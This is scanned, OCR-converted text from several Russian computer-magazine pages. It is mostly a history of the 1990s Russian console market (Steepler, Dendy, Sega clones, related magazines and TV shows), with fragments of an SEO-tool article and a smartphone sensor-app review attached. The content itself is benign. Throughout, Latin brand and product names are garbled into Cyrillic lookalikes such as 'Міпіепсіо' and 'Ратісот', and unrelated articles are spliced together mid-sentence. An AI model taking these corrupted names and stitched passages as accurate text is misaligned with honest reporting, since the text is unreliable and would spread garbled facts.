я именно на БеоНаглтег. Меня привлекла 
его простота и наглядность, а кроме того — 
я могу полностью контролировать процесс 
и видеть, что покупаю. Попробуй и выбе- 
ри на свой вкус. Глупо делать руками то, 
что машина сделает правильнее и быстрее :). 
Удачного продвижения! 30 




Ну просто тадіс ^апсі для сеошников :) 
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СЦЕНА 



Дмитрий Сударушкин (2отЬак0дтаіІ.сот) 




Как продавали 



ИСТОРИЯ СТАНОВЛЕНИЯ ОТЕЧЕСТВЕННОГО 
КОНСОЛЬНОГО РЫНКА 

Сейчас в это сложно поверить, но еще пятнадцать лет назад в России консоли 
представляли едва ли не самую заметную часть потребительского рынка ІТ. 

Прежде чем в каждый второй дом пришел компьютер, там побывала приставка. 





Фото мотоцикла сделал журналист 
Рустам Адагамов, и оно пошло на коробку с Оепбу 



ндустрия производства, перевода 
и озвучки видеоигр присутствует 
на нашем рынке в полном объеме, 
но двадцать лет назад про игровые консоли 
в России вообще никто не слышал. 

В то время как на Западе счастливые под- 
ростки и взрослые запоем играли в приставки 
от Аіагі и СоІесоѴізіоп, фанатели от игровых 
автоматов, западная игровая индустрия пере- 
живала кризисы, взлеты и падения, в нашей 
стране была полнейшая тишина. 

1992 . 



ПРЫГАЮЩИЙ СЛОН 



Как обстояли дела на нашем консольном 
рынке тогда? Довольно скудно. Конечно, были 
компьютеры и завезенный контрабандой 
Соттосіоге и даже иногда Атіда с Аіагі. Были 
отечественные попытки склонировать железо 
под наши реалии («Дубна», «Электроника»). 
Молодежь тусовалась по компьютерным 
клубам и училась запускать кассеты для 2Х 
Бресігигл. О том, что есть специализированные 
компьютеры, подключаемые к телевизору, 
а не монитору, и что они предназначены только 
для игр, страна узнала лишь в 1992 году. 

Тогда по ТВ стали крутить странную ре- 
кламу — слоненок прыгал на фоне кирпичной 
стены, а затем звучала песня «Денди-денди, 
мы все любим денди! Денди! Играют все!». 
Никаких телефонов, никаких адресов мага- 
зинов и пояснения того, что это вообще такое, 
не было. ІДелый месяц показа этой рекламы 
по телевидению разогрел публику основатель- 
но, и, когда в этой же рекламе появился теле- 
фон, на него обрушился шквал звонков. 

Выяснилось, что речь шла о новой элек- 
тронной игрушке для детей и что совсем скоро 



ее будут продавать в фирменном магаэине, 
в Москве на Красной Пресне. Народ терпели- 
во ждал открытия и не понимал, с чего вдруг 
такой ажиотаж вокруг детской игрушки. 

Всю эту музыку с рекламой и магазином 
заказывала московская фирма «Стиплер». Им 
удалось договориться с тайваньскими постав- 
щиками пиратских реплик Ратісот и успешно 
продавать их на постсоветском пространстве 
под маркой Оепсіу. 

1992 . 



СКАЧКИ С ПРЕПЯТСТВИЯМИ 



Компания «Стиплер» (от англ, зіееріег — ло- 
шадь, специально подготовленная к скачкам 
с препятствиями, то есть приученная к труд- 
ностям) была создана в 1991 году выходцами 
из мехмата МГУ Андреем Чеглаковым, Макси- 
мом Селивановым, Владиславом Улендеевым, 



выпускником МИФИ Андреем Андреевым, 
а также гражданином Германии Райнером 
Михлом (вложившим в бизнес более двух 
миллионов долларов). Компания занималась 
поставками на российские рынки компьютер- 
ного оборудования и техники. 

Фактически Біееріег можно назвать первым 
российским ІТ-интегратором. Они разрабаты- 
вали схемы, закупали оборудование и реализо- 
вывали ІТ-проекты. Созданная ими структура 
в Сбербанке РФ на базе компьютеров от НР 
работает до сих пор — если вы когда-нибудь 
смотрели на компьютер кассира, то могли уви- 
деть там чистый 005 (точнее, внешне похожую 
на 005 операционную систему 5С0 на основе 
ОМІХ) — это устаревшая техника, но в 1992 году 
она была сверхсовременной. «Стиплер» постав- 
лял ПО в банк «Менатеп», сотрудничал с Инком- 
банком, даже для администрации президента 
они осуществляли проект автоматизации. 





Одна из самых популярных редакций консоли — Оепсіу ^ипіог 



Г ^ 

СМіпТепсіоО 

многоликий НЕ5 

18 октября 1985 года японская 
компания Міпіепсіо выпустила 
на американский рынок свою 
консоль Міпіепсіо Епіегіаіптепі 
Бузіет (на родине, в Японии, 
она начала продаваться на два 
года раньше — в 1983-м, но дата 
начала продаж в США традиционно 
считается «настоящим» днем 
рождения). В Японии, Сингапуре, 
Вьетнаме, Гонконге и на Ближнем 
Востоке ее знают под именем 
Ратііу Сотриіег (сокращенно 
Ратісот), в Южной Корее — СотЬоу, 
в Индии — ^І 2 Кі(1, в Польше — 
Редавиз. 
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СЦЕНА 



Біееріег рос и развивался бешеными тем- 
пами, и вскоре бизнес пришлось делить на до- 
черние компании. Так возник Зіееріег бгарЫс 
Сепіег, специализирующийся на компьютерной 
графике (они существуют до сих пор и один 
раз продали СогеІ свою версию электронных 
таблиц а-ля ЕхсеІ под названием Зрісіег), 
5(еерІегТгасііпд, занимавшийся поставками 
оргтехники, и даже обучающий центр Біееріег, 
готовивший программистов и системных адми- 
нистраторов. 

1993 . 



ДРАКОНЫ НА ЛОШАДЯХ 



В 1993-м предпринимателям пришла в голову 
идея создать собственный журнал-каталог, 
чтобы повысить узнаваемость бренда Оепсіу 
у населения и сформировать свой собственный 
фан-клуб. Примерно так же, как Міпіепсіо это 
удалось сделать с журналом Міпіепсіо Роѵѵег. 

На заре 90-х было не так уж много из- 
дательств, умеющих выпускать журнал 
с нуля, — у «Стиплера» не было ни редакторов, 
ни журналистов. Но у издательского дома 
«Видео-Асс» такие ресурсы были. С 1990-го 
они выпускали журнал «Видео-Асс» (и его 
спутники — журналы «Премьер», «Фаворит» 
и другие) — издание, рассказывающее о кино 
и киноиндустрии. 

У владельца издательского дома, Влади- 
мира Борева, существовали контакты во Фран- 
ции, в издательстве Ашетт Филипаки-Пресс 
(НасЬеие РіІірассЬі Ргевзе). У Ашетт существо- 
вали два похожих журнала — Зоурасі и Зоузііск, 



и материалы первое время можно было брать 
оттуда — благо переводчиков с французского 
в издательском доме хватало. 

Другое дело — откуда было брать ил- 
люстрации? И кто будет заниматься общим 
направлением и редакционной политикой 
журнала? На эти вопросы не было ответов. 

В первых номерах пришлось выкручиваться 
самому владельцу: скриншоты игр делались 
кустарным способом — фотографировался 
телевизор, а отпечаток с фотографии встав- 
лялся в журнал. Затем стало полегче — по- 
явились переведенные французские тексты 
и описания игр, а журналом полностью занял- 
ся заместитель главного редактора и большой 
фанат видеоигр Валерий Поляков (несмотря 
на то что на последней странице главным 
редактором значился Борев, фактически жур- 
налом занимался исключительно Поляков). 

Журнал «Видео-Асс: Оепсіу» в нашей стра- 
не зародил культуру игровой журналистики. 
Сейчас текст этого журнала читать практи- 
чески невозможно — вопиющий непрофес- 
сионализм авторов и повальная графомания 
слишком сильно бросается в глаза, но в 90-х 
было совсем другое дело. Журнал занимался 
тем, что продвигал в массы даже не новые 
продукты Біееріег и не любовь к развлечени- 
ям перед телевизором, скорее это был новый 
концепт для русского человека и уже в самую 
последнюю очередь — сама игра. 

Именно поэтому журнал был культо- 
вым — детское сознание воспринимало игры 
как некую чудесную «магию», волшебство 
технологий, сказку. Журнал покупали даже 



те, кто не имел приставки вовсе, лишь бы хоть 
краем глаза взглянуть на этот волшебный мир. 
Скриншоты какой-нибудь «Сеги» рассматри- 
вались детьми чуть ли не под микроскопом, 
а графика живо обсуждалась. 

Поляков понятия не имел, как писать 
об играх (первые выпуски журнала больше на- 
поминали каталог), но сделал ставку на соэда- 
ние контента самими детьми — так появились 
фанатские рубрики, страница «Забор» (вы- 
держки из писем без комментариев), «прохож- 
дения» игр, свои внутренние, условные какие- 
то шутки, стихи, рисунки и комиксы на тему 
и даже обсуждения последних просмотренных 
мультфильмов. Был даже свой собственный 
маскот — Великий Дракон (под этим псевдони- 
мом скрывался двадцатипятилетний студент 
Вадим Захарьин). 

Неудивительно, что большинство детей, 
пишущих более или менее адекватно, брали 
в штат журнала авторами. Многие журналисты 
игровых изданий (например, главный редактор 
«Страны Игр» Константин Говорун или главный 
редактор «АнимеГида» Валерий Корнеев) на- 
чинали именно в «Видео-Асс: Оепсіу». 

В 1995-м, после того как «Стиплер» урезал 
финансирование, журнал разделился. «Сти- 
плеровский» проект переродился в журнал 
«Оепсіу: Новая реальность» и просущество- 
вал всего пять номеров (его качество сильно 
«оставляло желать»). «Видео-Асс: Оепсіу», 
практически полностью сохранивший авторов, 
набор рубрик и самое главное — фанатов, вы- 
лился в отдельный проект — журнал «Великий 
дракон» и из «Видео-Асс» переехал в из- 



Команда А 



Со Біееріег в свое время связалось столько известных 
людей, что даже удивительно, как мало об истории этой 
компании можно найти в интернете. 




ВЛАДИСЛАВ 

УЛЕНДЕЕВ 

гендиректор «Сти- 
плера» и «Лампорта». 
Возглавлял холдинг 
еНоизе (гатЫег, 
(ІатосЬка, огоп.ги), 
работал в Х5 Реіаіі 
бгоир (Воіего, 

003. ру, «Пятерочка», 
«Карусель», «Пере- 
кресток»). 



ИВАН МАКСИМОВ 

аниматор, режиссер, 
преподаватель во 
ВГИКе. Нарисовал 
того самого слоненка 
и логотип Оепсіу. 









РУСТЕМ АДАГАМОВ 

блогер, журналист, 
фотограф. Шеф- 
редактор службы ме- 
диаблогов компании 
«СУП» (владельцы 
ЖЖ). Известнейший 
фотоблогер (сігидоі) — 
рисовал для Оепсіу 
дизайн коробки. 




АСКАР ТУГАНБАЕВ 

интернет-продюсер, 
директор в СТС- 
Медиа, бывший 
ведущий программы 
«Времечко» на НТВ. 
Переводил инструк- 
ции на русский язык. 



ВИКТОР САВЮК 

гендиректор ин- 
тернет-холдинга 
«Акадо». Отвечал за 
внедрение проекта 
Оепсіу в России. 



МАКСИМ КОНОНЕНКО 

радиоведущий стан- 
ции «Маяк», созда- 
тель сайта «Владимир 
Владимирович"» 
Работал в «Стиплере» 
программистом. 
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Как продавали слона 



дательство «АСТ». ВД просуществовал еще 
долгое время после «стиплеровской» эпохи 
и закрылся лишь в 2003-м, навсегда оставив 
о себе память как о первом удачном игровом 
журнале в России. 

1994 . 



ЗАВОД 



На волне массовой истерии по Оепгіу в 1994 
году «Стиплер» понимает, что возросший 
спрос на приставки и картриджи удовлетво- 
рять не в силах. Вдобавок основную прибыль 
компании приносили все же не приставки, 
а тот самый «ИТ-консалтинг и решения». «Сти- 
плер» крепко подсаживается на нефтегазовые 
компании — услуги автоматизации и бизнес- 
решений на базе компьютеров и начинающего- 
ся зарождаться в России интернета востре- 
бованы, как никогда, и деньги там крутятся 
колоссальные. 

Попутно руководство компании понимает, 
что в «таскание коробок» туда-сюда они уже 
наигрались. Надо строить серьезные бизнесы, 
а продажи товара (пусть и приносящего день- 
ги) — это детский лепет по сравнению с прода- 
жей решений. Фирма раздает всем встречным 
и поперечным права франчайзиатов. Любой 
может продавать продукцию «Стиплера», если 
обещает сохранить фирменное название и сти- 
листику Оепсіу и не продавать конкурирующей 
продукции — то есть клонов той же Ратісот 
от китайцев. 

В январе 94-го «Стиплер» делится на не- 
сколько мелких компаний, разбившись 



по профилю деятельности. «Стиплер Трейд» 
становится компанией «Іатрогі» и получает 
под свое крыло все продажи и розничные 
магазины. Графический центр уходит под 
знамя Зіееріег бгарЫсз бгоир. Вдобавок 
«Стиплер» организовывает свое собственное 
производственное направление и ищет реше- 
ние, как выпускать приставки и картриджи 
в России, не заказывая их с Тайваня. Таким ре- 
шением становится подмосковный (находится 
в городе Дубна) завод «Тензор». 

Завод переживает не лучшие времена. Ему 
нечем платить аренду, и на организованном 
Госкомимуществом России конкурсе он уходит 
с молотка. Естественно, что покупает его «Сти- 
плер». На пост председателя совета дирек- 
торов назначают Андрея Андреева. В течение 
года «Стиплер» строит производственную 
линию. Но тут начинаются проблемы с права- 
ми. На российский рынок наконец обращает 
внимание Міпіепсіо. 

1994 - 1995 . 



ЯПОНСКИЕ РАЗБОРКИ 



Авторские права ее волнуют в самой малой сте- 
пени — во-первых, восьмибитки уже морально 
устарели и битва идет за 16-битные приставки, 
во-вторых, в среде растущей конкуренции 
с «Сегой» Міпіепгіо спит и видит, как уничтожить 
конкурента хотя бы в отдельно взятой стране. 

Разборки между Беда и Міпіепгіо напо- 
минаюттретью мировую войну — в ход идет 
все, чтобы уничтожить конкурента. У «Сеги» 
на руках игровая консоль Беда Меда Огіѵе 




АНТОН ЗАЙЦЕВ 

сценарист, телеведу- 
щий, актер. Вместе 
с Борисом Репетуром 
вел программу про 
компьютерные игры 
«От винта!», спонси- 
руемую «Стиплером». 




БОРИС РЕПЕТУР 

актер, телеведущий, 
актер озвучивания, 
«закадровый голос» 
российского ТВ. 

Золотой голос России, 
озвучивал столько 
роликов, фильмов и 
видеоигр, что и не 
перечесть. Вел про- 
грамму «От винта!» 
с Зайцевым. 




АНДРЕЙ ЧЕГЛАКОВ 

один из учредителей 
«Стиплера», созда- 
тель благотворитель- 
ных фондов, меценат. 
Работал в «Гознаке» 
директором по науке 
и развитию, внедрял 
вместе с Николаем 
Фоменко проект 
МаРизБіа — супердо- 
рогих концепт-каров. 




Первый выпуск журнала Видео-Асс: Оепсіу, больше 
напоминающий каталог игр, чем журнал 

(выпущенная на рынок Америки под мар- 
кой бепезіз из-за юридических проблем 
с лицензированием названия), с приличным 
по тем временам процессором (7,7 МГц), 
но несколько устаревшая по всем остальным 
параметрам. 

У Міпіепбо более совершенная по техно- 
логии (большее разрешение, специальный 
режим Мосіе 7 для обработки векторной 
графики, встраиваемый в некоторые картрид- 
жи процессор трехмерных эффектов БирегРХ 
и БирегРХ2), но с более слабым процессором 
(3,6 МГц) консоль Бирег Міпіепбо. 

Маркетологи Беда цепляются за цифры ме- 
гагерц в рекламном ролике на американском 
и японском телевидении и утверждают, что их 
консоль «делает то, что Нинтендо не может» 
(бепезіз сіоез ѵѵЬаІ Міпіепсіо'пі — игра слов), 
а потом заявляют о наличии в Беда Меда 
Огіѵе метода «взрывной обработки» (ВІазІ 
Ргосеззіпд), поэтому игры якобы быстрее, 
лучше и вообще наше все. 

Разумеется, это полная ерунда, но народ 
верит. Міпіепсіо в срочном порядке пытается 
завоевать другие рынки сбыта, на которые 
пока еще не пришла Беда, поэтому ищет 
поставщика, способного продавать Бирег 
Міпіепсіо в России. 

И тут «Стиплер», который торгует фактиче- 
ски контрафактом, но зато может обеспечить 
логистику и продажи. 

Испугавшись судебных исков от Міпіепсіо, 
которые вполне могли бы возникнуть, руково- 
дители «Стиплера» поручают ІаппрогГу (заме- 
тим, что это уже не дочерняя фирма, руководят 
ей другие люди, но договоренности между 
ними никто не отменял) начать выпускать 
свой собственный клон Ратісот — приставку 
Кепда. Делают ее там же, в Дубне, но при этом 
зачем-то врут, что закупают за границей. 
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СЦЕНА 




Сам же «Стиплер» в срочном порядке 
организовывает совместное с Инкомбанком 
предприятие под названием просто Оепсіу 
и передает ему все права на продажу при- 
ставок. Приставки теперь делаются на заводе 
в Дубне, но доказать причастность «Стиплера» 
к заводу довольно проблематично — несмотря 
на то что люди одни и те же, компании на бума- 
ге — разные. 

Таким образом, у «Стиплера» на руках 
не оказывается ни одного бизнеса, связан- 
ного с консолями. Кенгу продает Іатрогі. 
Оепсіу продает «Денди». Конкуренты — Р-5ІуІе 
продает свои Віітап'ы (Віі дате, Віі зузіет), 
а нелегально завезенные китайские клоны 
СІ^а, ІМ-888, Ыпко, БиЬог также присутствуют 
на рынке, но «Стиплер» к ним никакого от- 
ношения уже не имеет. Бизнес обелен, и можно 
начать работать с Міпіепсіо. Впрочем, рынок 
просто переполнен восьмибитками. 

Японцы, мягко говоря, сильно удивлены 
происходящим в России, поэтому действуют 
осторожно. Беда заключает контракт на постав- 
ку в Россию консолей с японской же фирмой 
МізЬо Іѵѵаі, опасаясь проблем со странными 
русскими партнерами, а уже та, в свою очередь, 
выбирает себе партнера на российском рын- 
ке — им становится компания «Форрус». «Сти- 
плеру» с ними договориться не удается, поэтому 
им приходится продавать дорогой вариант 
консоли, закупая их у партнеров из Сингапура. 

Практически закрыв глаза на вопиющее 
нарушение ее авторских прав, Міпіепсіо идет 
на сделку со «Стиплером». По их соглашению, 
«Стиплер» обязуется полностью отказаться 
от продаж продукции Беда, а взамен получает 
эксклюзивные права на продажу новой консо- 
ли от японцев — Бирег Міпіепсіо. 

1994 - 1996 . 



ТЕЛЕПЕРЕДАЧА 



Необходимо как-то рекламировать новую 
(и весьма дорогую по российским меркам) 
приставку. «Стиплер» решает создать свою 
собственную телепередачу. Так появляется 
культовая в России программа «Денди — 

Новая реальность» (позднее просто «Новая 
реальность»), которую обожают дети. Рейтинги 
передачи бьют все возможные рекорды, 
без преувеличения можно сказать, что с 1994 



по 1996 год ее смотрел почти каждый подро- 
сток на территории бывшего СССР. 

Продюсером, режиссером, сценаристом 
и ведущим программы был Сергей Супонев, по- 
своему легендарная личность на отечествен- 
ном ТВ, — вся передача держалась только 
за счет харизмы этого человека. 

И хотя сейчас она воспринимается 
как очень наивная, нужно понимать, что Су- 
понев был первым, кто умел разговаривать 
на одном языке с детьми. Да, передача со- 
держала в себе ляпы и ошибки, каждые три 
минуты рекламировался «Стиплер» (осо- 
бенно доставала навязчивая реклама Бирег 
Міпіепсіо), но за неимением лучшего это было 
просто феерично. 

Поначалу программа шла на канале 2x2 (не 
путать с тем 2x2, который существует сейчас), 
а после того, как Супоневу предложили занять 
место директора детских программ на ОРТ, 
переехала на первую кнопку. 

25 минут, отвлекаясь на рекламу и конкур- 
сы, а также обязательные походы в магазины 
«Денди», Супонев простым языком расска- 
зывал, про что та или иная игра, и показывал 
короткое видео, содержавшее геймплей. Ино- 
гда эти рассказы прерывались сообщениями 
на тему — показывали кадры из одноименных 
фильмов и мультфильмов, брались интервью 
у подростков и людей — кто что думает о про- 
дукции «Стиплера». 

Увы, программа просуществовала не- 
долго — «Стиплеру» так и не удалось до- 
говориться с ОРТ о более вменяемом таймсло- 
те — программа выходила в 15:45 по пятницам, 
считалось, что это время неудачное, так 
как не все дети в это время дома или смотрят 
телевизор. А затем «Стиплер» урезал финанси- 
рование, и программа закрылась, как нерента- 
бельная для канала. 

Но идея собственной программы не угас- 
ла — «стиплеровцы» договорились с каналом 
МТК и на нем начали показывать программу 
«Мир Оепсіу» вечером по субботам. Супонев 
отказался в очередной раз менять канал, 
поэтому пришлось придумать двух новых ве- 
дущих — ими стали актер кино Семен Фурман 
и подросток Андрей Гвоздев. 

Программа получилась неудачной. Фурман 
отчаянно переигрывал, Гвоздев смешно 
смотрелся в кадре, а игры показывали те же 



самые, что Супонев на ОРТ, и рейтинги стали 
ползти вниз. В итоге «Стиплер» закрыл пере- 
дачу совсем. 

1996 . 



ПАДЕНИЕ ГИГАНТА 



в своем интервью журналу «Навигатор 
игрового мира» от 2002 года Антон Зайцев 
обмолвится: 

Вопрос: Из-за чего в 97 году ваша програм- 
ма перешла со второго канала на НТВ? 

Антон Зайцев: Из-за того, что наши спонсо- 
ры скрылись на горных вершинах. Спонсором 
у нас была фирма «Стиплер», в какой-то мо- 
мент ее начальники пропали вместе с деньга- 
ми. Соответственно они перестали нам платить 
и сейчас где-то живут, богатые и счастливые. 

А программа на РТР закрылась. 

Долгое время не было понятно, почему же 
такая успешная фирма так внезапно разори- 
лась и пошла ко дну, — говорили о судебных 
процессах и даже о том, что консоли были «не- 
удачно спроектированы», поэтому «Стиплер» 
замучался оформлять возвраты и ремонты. 

Но наиболее вероятная версия была 
озвучена лишь в 2004 году в статье журнала 
РогЬез «Кто подставил слоника Оепсіу» — 
бывший учредитель «Стиплера» Максим 
Селиванов рассказывал в ней о том, что «Сти- 
плер» выиграл тендер на автоматизацию 
Государственной Думы (контракт почти на 30 
миллионов долларов), однако на его пути 
встало могущественное ФАПСИ (Федеральное 
агентство правительственной связи и инфор- 
мации — позже его расформируют и передадут 
в ведомство ФСБ). 

В неофициальной беседе «Стиплеру» было 
предложено «дуть отсюда», а несколько клю- 
чевых сотрудников компании попали в боль- 
ницу с травмами (а одного переехала машина), 
вдобавок компания начала лишаться государ- 
ственных контрактов по всей стране — «сверху» 
был спущен приказ никаких дел со «Стипле- 
ром» не иметь. На дружественного «Стиплеру» 
депутата было совершено покушение, и тогда 
учредители поняли, что из России надо времен- 
но уехать, — спокойно жить им не дадут. 

В любом случае, история Оепсіу в Рос- 
сии на этом практически закончилась — да, 
были продажи и после «Стиплера», а завод 
«Тензор», по-моему, до сих пор выпускает 
аппаратные клоны Ратісот, но эпоха восьми- 
биток как массового увлечения ушла вместе 
со «Стиплером». 

Народ довольно быстро перешел на деше- 
вую китайскую Беда Медасігіѵе II (БМЕБ из-за 
своей дороговизны особенного распростра- 
нения у нас не получила — второй массовой 
приставкой стала именно «Сега»). 

1993 - 1996 . 



СУПЕР-ЕЖИК 



Несмотря на очевидные аппаратные недо- 
статки, по сравнению с конкурентом Бирег 
МіпІеп(іо, приставка Беда Меда Огіѵе 2 (улуч- 
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Как продавали слона 



шенная, маленькая версия огромного Меда 
Огіѵе) получила в России второе дыхание. 

В основном это заслуга не официального пар- 
тнера «Сеги» в России — компании «Форрус», 
а скорее китайских производителей. Офици- 
альная цена на «Сегу» была 330-350 тысяч 
рублей (цена 1995 года), в то время как китай- 
ский клон стоил 120 тысяч. 

В отличие от аппаратных клонов Ратісот/ 
МЕ5, подделывать «Сегу» выходило для ки- 
тайцев дороже, за счет сложной архитектуры 
и нестандартных процессоров фирмы Моіогоіа. 
Никаких эмуляторов и систем-на-чипе не было 
и в помине, поэтому все тупо копировалось — 
сюда вот этот процессор, сюда вот эту плату. 

В Мегадрайве не было никакой аппаратной 
защиты, а единственный модуль проверки 
просто проверял наличие строчки «5еда» 
в определенном месте памяти — если строчки 
не было, игра не запускалась. Подделать такое 
было элементарно. 

Рынок наводнился «Сегами», и при- 
ставка от конкурента — Бирег Міпіепсіо у нас 
так и не прижилась. Слишком уж дорогая 
она была, а к тому времени начали появляться 
и первые консоли с трехмерной графикой. 

Однако основной успех «Сеги» крылся 
в библиотеке игр. Лицензионные картрид- 
жи с чипами сохранения игры и наворотами 
вроде мультиигр до нас доходили редко, зато 
все остальные не вызывали никаких проблем 
при пиратском тиражировании. В России была 
представлена чуть ли не вся библиотека игр 
Мегадрайва, в отличие отБирег Міпіепсіо, ко- 
торая распространялась только лицензионным 
способом. На старте продаж к БМЕБ предлага- 
лось около двадцати разных игр, а пиратская 
библиотека «Сеги» насчитывала сотни. 



Символом-талисманом (маскотом) «Сеги» 
был мультипликационный персонаж еж Со- 
ник — и он запомнится не только тем, что с ним 
был ряд шикарных игр, но и телепередачей 
«Соник Супер-Ежик», которую компания 
«Микродин» спонсировала на канале «РТР» 
(ныне «Россия»). 

Передача, словно в отместку созданная 
как «ответ Стиплеру», была вовсе даже не про 
игры, а скорее про семейные ценности — две 
семьи, обязательно с детьми, играли в студии 
в Бопіс 2 или БЬіпоЬі. Кто быстрее пройдет 
уровень — тот и выиграл. Главным призом 
была, конечно, консоль Беда Меда Огіѵе II, ко- 
торыми «Микродин» торговал. Передача про- 
существовала полгода и, когда «Микродин» 
обанкротились, просто перестала выходить. 
Впрочем, распространению «Сеги» это вовсе 
не помешало. 

1992 И ТАК ДАЛЕЕ. 



ТРЕХМЕРЩИНА 



Ну а что было дальше? Конечно, приставки, 
умеющие обрабатывать трехмерную графику. 
Первой такой консолью, появившейся на рос- 
сийском рынке, была приставка Р.Е.А.І. (модель 
Р2-1) от Рапазопіс, выпущенная по спецификаци- 
ям ЗОО. Такую приставку делали сразу несколько 
компаний — это и сама Рапазопіс, и ее конкурен- 
ты Бапуо и 6оІсІ5(аг (ныне 10). Приставки отлича- 
лись внешним видом и даже местами начинкой, 
но игры между ними были совместимы. 

Дальше была Бопу с ее РІауБіаІіоп 
и противостояние с Міпіепсіо 64 (где Бопу 
безоговорочно победила), провал Беда Баіигп 
и прочее. Но это, как говорится, совсем другая 
история. □□ 



НАЧИНЕННАЯ 

ДОБРОМ 

В американской версии МЕБ был встроен 
чип для защиты от пиратства 10МЕБ, 
который не позволял запускать кар- 
триджи, не подписанные у Міпіепсіо. В 
японской версии консоли Ратісот тако- 
го чипа предусмотрено не было. Именно 
эту версию и взяли китайцы, подвергли 
реверсивной инженерии и придумали 
систему МЕБ-ОМ-СНІР — в итоге у них 
фактически получился железный эмуля- 
тор Ратісот. 

Эмулятор позволял очень сильно 
удешевить производство — вместо 
кучи процессоров и распайки на плате 
присутствовал один чип. Но у железа 
Ратісот была особенность, которая 
сильно усложняла пиратам жизнь, — 
І/О-порт для связи с контроллерами чи- 
пов памяти на картридже МиКі-Метогу 
СопІгоІІегз (ММС, манеры). Он позволял 
разрабатывать игры без ограничений 
аппаратной части приставки — это был 
задел на будущее, когда консоль уста- 
реет. 

Для связи с портом производители 
игр делали собственные микросхемы 
и контроллеры памяти, расположенные 
внутри картриджа с игрой. В игру можно 
было добавить новых звуков или гра- 
фики, которую нельзя было поместить в 
память приставки изначально. На консо- 
ли было всего 2 Кб памяти, на картридже 
же могло быть и 16, а то и 32 Кб. Инфор- 
мацию из мапера можно было подгру- 
жать в ОЗУ приставки на лету. 

Для китайцев же такая система 
означала одно — помимо самих при- 
ставок, надо было штамповать и чипы 
в картриджах. А это удорожание про- 
изводства. Поэтому пиратили главным 
образом самые простые игры, которые 
железный эмулятор точно переваривал, 
а копии картриджей с дополнительными 
чипами выпускали редко. 

Некоторые игры на МЕБ-ОМ-СНІР 
все же не шли или работали с глюка- 
ми — менялась палитра, цвета, звук 
или игра подтормаживала, но это было 
меньшее зло. Именно такую пристав- 
ку «Стиплер» заказывает в Тайване. 
Дизайн как у оригинальной Ратісот, 
единственное отличие — отсоединяе- 
мые джойстики и встроенный модуль 
для РАІ/БЕСАМ (для работы на отече- 
ственных телевизорах). 

С точки зрения «Стиплера» бизнес 
полностью легален — они сами не про- 
изводят ничего, лишь поставляя гото- 
вый товар от китайцев. В фирменном 
магазине Оепсіу консоль продавалась 
за 39 тысяч рублей (94 доллара на конец 
92-го). 




Начинка китайской реплики консоли Ратісот с переходником на РА1/5ЕСАМ 
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О компасах, фонариках из ІЕО-вспышек и поддельных сканерах отпечатков пальцев для смартфонов 
слышали, наверное, все. Но что ты скажешь о датчике радиации, спидометре, измерителе пульса и ме- 
таллодетекторе? А ведь все это есть в маркете и вполне себе работает, показывая порой очень точные 
результаты. Не веришь? Я тоже не верил, поэтому лично провел испытания всех этих инструментов. 



ВМЕСТО ВВЕДЕНИЯ 



Эта статья посвящена наиболее интересным, 
странным и неоднозначным приложениям 
для мобильного устройства, способным расши- 
рить его функциональность и превратить в не- 
что большее, чем просто умный девайс. Здесь 
будет все, начиная от компасов и уровней и за- 
канчивая такими, казалось бы, невозможными 
вещами, как спидометр и детектор радиации. 



Все приложения были протестированы лично 
мной в боевых условиях на смартфоне Ватвипд 
баіаху Мехиз, который является референсным 
девайсом Соодіе, а это значит, что если уж 
на нем софтина не показала правильных ре- 
зультатов, то не покажет, наверное, нигде. 

Сразу хочу оговориться, что в статье не будет 
явно поддельных приложений, таких как «сол- 
нечная батарея из экрана смартфона» или «де- 



тектор лжи». Все это в лучшем случае игрушки, 
в худшем — вирусы. Речь пойдет только о том 
софте, работоспособность которого можно 
подтвердить законами физики и математики. 
Так что все, кто считает, что я лукавлю, говоря 
о, например, работоспособности приложения 
для измерения пульса, могут дальше не читать 
или пропускать спорные моменты, обругав 
автора про себя (хотя можно и вслух). 



Зтагі ТооІ5 1.5.1 



ОС: Ап(ігоі(1 2.2 и выше 
САЙТ: апсігоісІЬоѵІ.ЫодвроІ.ги 
ЦЕНА: 75 рублей 



Зтагі ТооІ5 






$тагІ ТооІБ — одна из самых полных и качественных коллекций инстру- 
ментов, основанных на разнообразных датчиках, которые установлены 
в смартфон или планшет. Здесь есть компас, угломер, уровень, линейка, 
инструмент для измерения расстояния до объектов, фонарик, датчик 
вибрации и шума, а также металлоискатель, основанный на компасе. 
Пятнадцать инструментов, за которые автор просит всего 75 рублей. Все 
их можно получить и бесплатно, но по отдельности (см. раздел «Другие 
приложения этого разработчика» в боодіе РІау). 

Большинство инструментов здесь очевидны и не требуют каких-либо 
доказательств работоспособности, однако такие тулзы, как измери- 
тель расстояния, металлодетектор, а также датчики вибрации и шума 
вызывают особый интерес у исследователя. Первый примечателен хотя 
бы тем, что он работает и включает в себя, помимо прочего, измеритель 
высоты. Принцип его работы такой же, что и у строительного прибора 
под названием теодолит: зная разницу между высотой объекта и при- 
бора, а также угол наклона прибора, можно точно вычислить расстояние 
до объекта и измерить его высоту. Если же говорить об этом приложе- 
нии, то достаточно просто запустить его, встать на ноги и навести «при- 
цел» на основание объекта, чтобы на экране появилась информация 
о расстоянии. По умолчанию приложение предполагает, что смартфон 
находится на расстоянии 1,5 метра от земли, но это значение можно из- 
менить, нажав в левый нижний угол экрана. Высчитывать следуеттак: 
твой рост минус 0,3. 

Проведя испытания с рулеткой, удалось выяснить, что на небольших 
расстояниях (1-5 метров) инструмент показывает абсолютно точные 
результаты как для расстояния, так и для высоты. Затем начинаются 
погрешности, которые будут тем больше, чем дальше будет находить- 
ся объект, а где-то на 100 метрах результаты уже получаются совсем 
неадекватными реальности. Тем не менее для небольших домашних 
измерений инструмент подходит отлично. 

Теперь о металлодетекторе. В основу его работы положен все тот же 
компас, намагниченная стрелка которого поворачивается к близким ме- 
таллическим объектам. В испытаниях показал себя достойно, позволив 
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ды. Дальность действия составила не больше 3 сантиметров, что позво- 
ляет использовать его для поиска оружия у пришедших гостей, но никак 
не для розысков клада капитана Флинта. 

Измерители шума и вибрации. Первый использует микрофон 
смартфона и просто показывает уровень шума в децибелах. Сравнивать 
качество его показаний было не с чем, поэтому ничего определенного 
сказать не могу (кроме того, что стоящий рядом ноутбук в тишине шумит 
на уровне 30 децибел). Виброметр также оказался довольно занятной, 
но абсолютно бесполезной штукой, основанной на датчике положения. 
Наиболее интересен своей «шкалой интенсивности Мерка», последним 
пунктом в которой идет «Практически полное разрушение». 

Порадовало увеличительное стекло, которое в отличие от аналогов, 
представленных в маркете, действительно качественно и без лишних 
шумов увеличивает текст, постоянно сохраняя нужный фокус, и по- 
